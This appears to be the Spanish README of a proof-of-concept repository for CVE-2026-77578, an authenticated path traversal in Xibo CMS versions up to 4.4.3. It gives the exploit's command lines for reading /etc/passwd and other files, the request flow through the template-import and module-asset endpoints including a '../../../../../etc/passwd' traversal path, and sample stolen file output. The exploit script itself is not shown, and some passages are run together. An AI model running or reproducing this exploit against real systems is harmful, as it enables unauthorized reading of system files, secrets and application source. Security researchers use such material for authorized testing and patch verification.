
Prueba de concepto en Python que explota CVE-2026-77578, un path traversal autenticado en Xibo CMS que lee archivos locales arbitrarios mediante importaciones de plantillas XML manipuladas.
CVE-2026-77578 es una vulnerabilidad de Lectura Arbitraria de Archivos Locales autenticada en Xibo CMS.
Un usuario autenticado con privilegios de Administrador o acceso a Plantillas de Módulo puede importar una plantilla XML manipulada que contiene un recurso basado en rutas con una secuencia de traversal. El recurso resultante puede entonces ser accedido a través del endpoint de recursos del módulo, provocando que Xibo devuelva el contenido del archivo local referenciado.
<= 4.4.3>= 4.4.4AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)Xibo publicó la vulnerabilidad como GHSA-pc3g-2hhm-46qc, confirmando que las versiones <= 4.4.3 están afectadas y >= 4.4.4 están parcheadas. El aviso asigna severidad Alta con una puntuación CVSS v3.1 de 8.8 e identifica CVE-2026-77578.
El PoC en Python proporcionado automatiza el proceso de explotación:
/developer/template/import./module/asset/<asset-id>.python3 poc.py <URL> -u <USERNAME> -p <PASSWORD> -f <FILE>
Ejemplo:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/passwd
Otro ejemplo:
python3 poc.py http://localhost \
-u xibo_admin \
-p password \
-f /etc/os-release
La opción -f por defecto es /etc/passwd.
Lo siguiente demuestra la recuperación exitosa de /etc/passwd:
==============================================
FILE CONTENT
==============================================
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...

Authenticated User
|
v
GET /developer/template/view
|
v
Extract X-XSRF-TOKEN
|
v
POST /developer/template/import
|
| Crafted XML
| path="../../../../../etc/passwd"
v
Xibo creates the asset
|
v
GET /module/asset/<asset-id>
|
v
Contents of local file returned
La vulnerabilidad fue validada exitosamente contra múltiples archivos en un entorno de prueba local de Xibo CMS 4.4.3, incluyendo:
/etc/passwd/etc/hosts/etc/os-release/var/www/cms/web/index.phpLa prueba con el archivo fuente PHP demuestra que el problema es capaz de devolver código fuente de la aplicación, no solo metadatos del sistema.
La explotación exitosa permite a un atacante autenticado con los privilegios requeridos de Plantillas de Módulo leer archivos arbitrarios accesibles al proceso de la aplicación Xibo.
Dependiendo del despliegue, esto puede exponer:
Esta prueba de concepto se proporciona únicamente para fines de investigación de seguridad autorizada y pruebas defensivas.
Solo pruebe sistemas que posea o para los que tenga permiso explícito de evaluar.
CVE-2026-77578/
├── poc.py
├── README.md
├── LICENSE
├── .gitignore
└── screenshots/
└── poc-output.png